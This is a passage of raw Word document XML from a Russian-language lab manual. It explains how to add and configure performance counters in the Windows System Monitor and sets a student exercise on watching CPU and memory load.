                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Выбор вхождения их списка</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <o:callout v:ext="edit" minusy="t"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r w:rsidRPr="00B56D78">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>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49" type="#_x0000_t48" style="position:absolute;left:0;text-align:left;margin-left:395.1pt;margin-top:145.85pt;width:87.35pt;height:43.8pt;z-index:251665408" adj="-45104,4068,-23133,4438,-1484,4438,-43695,4784">
            <v:textbox>
              <w:txbxContent>
                <w:p w:rsidR="00C23A43" w:rsidRPr="00E656E5" w:rsidRDefault="00C23A43" w:rsidP="00E656E5">
                  <w:pPr>
                    <w:ind w:firstLine="0"/>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00E656E5">
                    <w:rPr>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Информация о добавленном счетчике</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r w:rsidR="004B6AD5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3031490" cy="2484120"/>
            <wp:effectExtent l="1905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66" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3031490" cy="2484120"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">В диалоговом окне </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Добавить счетчики</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> из раскрывающегося списка </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Объект</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> можно выбрать свыше 40 объектов наблюдения за производительностью компьютера, с помощью которых можно контролировать различные параметры. В частности, можно анализировать </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>работу кеш-памяти, логического и физического дисков, центрального процессора, оперативной, файловой системы, и т.п.</w:t>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szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">После выбора объекта обратитесь к списку </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Выбрать счетчики</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> из списка, в котором доступно 15 различных счетчиков. Для проведения комплексной проверки выберите переключатель Все счетчики. Для локального контроля над одним устройством или процессом, например конкретным принтером, программой или USB-портом, выберите требуемый объект из списка </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Выбрать вхождения</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> из списка</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>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szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Если вы анализируете производительность всех устройств, выберите переключатель </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Все вхождения</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Новый счетчик появляется в списке счетчиков в нижней области правой панели (системного монитора). Появится и новый график, соответствующий выбранному счетчику. </w:t>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szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Краткий комментарий для счетчика можно найти в диалоговом окне </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Добавить счетчики</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, щелкнув на кнопке </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Объяснение</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Для выделения собственно графика щелкните на названии объекта в списке счетчиков и на кнопке </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Выделить</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="237490" cy="245110"/>
            <wp:effectExtent l="1905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67" cstate="print"/>
                    <a:srcRect l="43181" t="10612" r="54172" b="85550"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="237490" cy="245110"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> на панели инструментов системного монитора.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="004B6AD5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Изменить оформление счетчиков монитора </w:t>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szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Щелкните правой кнопкой мыши на поле системного монитора и выберите команду </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Свойства</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, чтобы открыть окно свойств монитора. В нем представлено несколько вкладок, позволяющих. В частности, можно изменить фоновый рисунок, шрифт, выбрать тип отображения (график, гистограмма или отчет), отображать вертикальную или горизонтальную сетку и т.д.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="004B6AD5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1758484" cy="1922400"/>
            <wp:effectExtent l="1905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68" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1756798" cy="1920557"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="004B6AD5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Практическая часть:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="004B6AD5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задача</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: с помощью программы </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Производительность</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Системного монитора) выяснить, как изменяется загрузка процессора и объем занятой оперативной памяти в ходе обычной работы с прикладной программой. Результаты лабораторной работы нужно будет оформить в виде отчета. Получившаяся в окне </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Производительность</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> диаграмма должна быть </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>сфотографирована</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> с помощью клавиши </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PrintScreen</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и помещена в отчет</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="004B6AD5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="004B6AD5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Провести </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>мониторинг</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ОС с </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>помощью</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> программы </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Производительность</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="004B6AD5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Порядок выполнения работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Запустите программу MS Word, откройте новый лист для отчета сохраните файл в своей папке.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Запустите программу </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Производительность</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Просмотрите, какие в системе существуют объекты производительности (внесите данные в отчет).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Просмотрите данные счетчиков в виде графика, гистограммы, отчета.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Раскройте на весь экран окно программы </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Производительность</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и запустите графики заново. (нажмите кнопку </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Очистить экран</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="316865" cy="273685"/>
            <wp:effectExtent l="19050" t="0" r="698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69" cstate="print"/>
                    <a:srcRect l="23253" t="10585" r="73904" b="85873"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="316865" cy="273685"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
